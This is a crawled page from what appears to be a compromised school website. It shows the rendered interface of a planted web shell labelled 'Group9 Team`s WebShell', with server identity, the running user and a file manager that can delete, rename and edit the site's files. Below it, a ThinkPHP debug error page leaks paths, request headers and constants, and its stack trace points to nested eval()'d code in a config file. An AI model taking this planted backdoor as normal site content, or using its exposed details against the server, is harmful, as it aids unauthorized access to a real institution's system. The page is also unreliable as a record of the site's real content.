42.247.81.66 - Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 - whoami(www) - 【uid(1001) gid(1001)】 - 【MySql】
Group9 Team`s WebShell

路径

上传重命名为
System Error
上级目录操作属性创建时间修改时间下载
app删除 改名07552025-04-17 20:41:232025-04-17 20:41:23-
caches删除 改名07552025-04-17 20:43:052025-04-17 20:43:05-
config删除 改名07552023-03-09 15:29:292023-01-30 18:23:14-
data删除 改名07552025-07-18 22:12:492025-07-18 22:12:49-
statics删除 改名07552023-03-09 15:29:292020-05-07 12:18:18-
system删除 改名07552023-03-09 15:29:292020-05-07 12:18:20-
template删除 改名07552023-03-09 15:29:292020-05-07 12:18:20-
uploads删除 改名07552025-07-19 10:50:232025-07-19 10:50:23-
.htaccess编辑 改名07552023-03-09 15:29:292023-01-30 18:46:505.36 K
.user.ini编辑 改名06442023-03-07 15:10:322023-03-07 15:10:3246 B
12编辑 改名06442025-07-19 17:02:552025-07-19 17:02:55583.06 K
123.php编辑 改名06442025-07-19 16:49:502025-07-19 16:49:5024 B
404.htm编辑 改名07552023-03-09 15:29:292023-01-30 18:19:271.97 K
404.html编辑 改名07552023-03-09 15:29:292023-01-30 18:19:27479 B
README.md编辑 改名07552025-04-26 20:50:562023-01-30 18:19:2710 B
error.htm编辑 改名07552023-03-09 15:29:292023-01-30 18:56:5615.77 K
index.html编辑 改名07552025-04-27 12:31:422023-01-30 18:19:27917 B
index.php编辑 改名07552025-04-28 06:45:402025-04-28 06:45:40425 B
robots.txt编辑 改名07552023-03-09 15:29:292023-01-30 18:19:2726 B
router.php编辑 改名07552023-03-09 15:29:292023-01-30 18:19:27145 B
tencent1496174700728729157.txt编辑 改名07552025-04-26 20:51:402023-02-28 09:48:5320 B
version.php编辑 改名07552025-04-26 20:51:502023-01-30 18:19:27140 B
yunu.php 编辑 改名07552023-03-09 15:29:292023-01-30 18:19:271.06 K
目录[8] - 文件[15] - 属性[0755]

[2] ErrorException in Session.php line 105

session_start(): Cannot send session cookie - headers already sent by (output started at /www/wwwroot/whgmxy.edu.cn/config/extra/extra.php(4) : eval()'d code(3) : eval()'d code(9) : eval()'d code:379)

  1. // 读取session驱动
  2. $class = false !== strpos($config['type'], '\\') ? $config['type'] : '\\think\\session\\driver\\' . ucwords($config['type']);
  3. // 检查驱动类
  4. if (!class_exists($class) || !session_set_save_handler(new $class($config))) {
  5. throw new ClassNotFoundException('error session handler:' . $class, $class);
  6. }
  7. }
  8. if ($isDoStart) {
  9. session_start();
  10. self::$init = true;
  11. } else {
  12. self::$init = false;
  13. }
  14. }
  15. /**
  16. * session自动启动或者初始化
  17. * @return void

Call Stack

  1. in Session.php line 105
  2. at Error::appError(2, 'session_start(): Can...', '/www/wwwroot/whgmxy....', 105, ['config' => ['id' => '', 'var_session_id' => '', 'prefix' => 'think', ...], 'isDoStart' => true])
  3. at session_start() in Session.php line 105
  4. at Session::init() in Session.php line 119
  5. at Session::boot() in Session.php line 248
  6. at Session::delete('sys_areainfo', null) in helper.php line 308
  7. at session('sys_areainfo', null) in Common.php line 73
  8. at Common->_initialize() in Controller.php line 56
  9. at Controller->__construct(object(Request))
  10. at ReflectionClass->newInstanceArgs([object(Request)]) in App.php line 215
  11. at App::invokeClass('app\wap\controller\S...') in Loader.php line 420
  12. at Loader::controller('show', 'controller', false, 'Error') in App.php line 390
  13. at App::module(['wap', 'show', 'index'], ['app_debug' => true, 'app_trace' => false, 'app_status' => '', ...], null) in App.php line 295
  14. at App::exec(['type' => 'module', 'module' => ['wap', 'show', 'index']], ['app_debug' => true, 'app_trace' => false, 'app_status' => '', ...]) in App.php line 123
  15. at App::run() in start.php line 19
  16. at require('/www/wwwroot/whgmxy....') in index.php line 14

Exception Datas

Error Context
config { "id": "", "var_session_id": "", "prefix": "think", "type": "", "auto_start": true, "httponly": true, "secure": false }
isDoStart true

Environment Variables

GET Data

etitle
152
ctitle
xiaoyuanfengguang
POST Data
empty
Files
empty
Cookies
empty
Session
empty

Server/Request Data

USER
www
HOME
/home/www
FCGI_ROLE
RESPONDER
SCRIPT_FILENAME
/www/wwwroot/whgmxy.edu.cn/index.php
QUERY_STRING
s=wap/show/index&etitle=152&ctitle=xiaoyuanfengguang
REQUEST_METHOD
GET
CONTENT_TYPE
CONTENT_LENGTH
SCRIPT_NAME
/index.php
REQUEST_URI
/m/xiaoyuanfengguang/152.html
DOCUMENT_URI
/index.php
DOCUMENT_ROOT
/www/wwwroot/whgmxy.edu.cn
SERVER_PROTOCOL
HTTP/1.1
REQUEST_SCHEME
http
GATEWAY_INTERFACE
CGI/1.1
SERVER_SOFTWARE
nginx/1.22.1
REMOTE_ADDR
216.73.216.147
REMOTE_PORT
64508
SERVER_ADDR
42.247.81.66
SERVER_PORT
80
SERVER_NAME
whgmxy.edu.cn
REDIRECT_STATUS
200
PATH_INFO
wap/show/index
HTTP_ACCEPT
*/*
HTTP_USER_AGENT
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
HTTP_ACCEPT_ENCODING
gzip, br, zstd, deflate
HTTP_HOST
www.whgmxy.edu.cn
HTTP_VIA
1.1 squid-proxy-5b5d847c96-48sgk (squid/6.10)
HTTP_X_FORWARDED_FOR
10.2.190.52
HTTP_CACHE_CONTROL
max-age=259200
HTTP_CONNECTION
keep-alive
PHP_SELF
/index.php
REQUEST_TIME_FLOAT
1752916131.3961
REQUEST_TIME
1752916131
Environment Variables
empty

ThinkPHP Constants

APP_PATH
/www/wwwroot/whgmxy.edu.cn/app/
APP_AUTO_BUILD
true
APP_DEBUG
true
CONF_PATH
/www/wwwroot/whgmxy.edu.cn/config/
THINK_VERSION
5.0.9
THINK_START_TIME
1752916131.397
THINK_START_MEM
264504
EXT
.php
DS
/
THINK_PATH
/www/wwwroot/whgmxy.edu.cn/system/
LIB_PATH
/www/wwwroot/whgmxy.edu.cn/system/library/
CORE_PATH
/www/wwwroot/whgmxy.edu.cn/system/library/think/
TRAIT_PATH
/www/wwwroot/whgmxy.edu.cn/system/library/traits/
ROOT_PATH
/www/wwwroot/whgmxy.edu.cn/
EXTEND_PATH
/www/wwwroot/whgmxy.edu.cn/app/extend/
VENDOR_PATH
/www/wwwroot/whgmxy.edu.cn/app/vendor/
RUNTIME_PATH
/www/wwwroot/whgmxy.edu.cn/caches/
LOG_PATH
/www/wwwroot/whgmxy.edu.cn/caches/log/
CACHE_PATH
/www/wwwroot/whgmxy.edu.cn/caches/cache/
TEMP_PATH
/www/wwwroot/whgmxy.edu.cn/caches/temp/
CONF_EXT
.php
ENV_PREFIX
PHP_
IS_CLI
false
IS_WIN
false
THISDIR
/www/wwwroot/whgmxy.edu.cn/
ROOTDIR
/www/wwwroot/whgmxy.edu.cn/
EXISTS_PHPINFO
true
VERSION
Group9 Team`s WebShell
WAP_PRE
m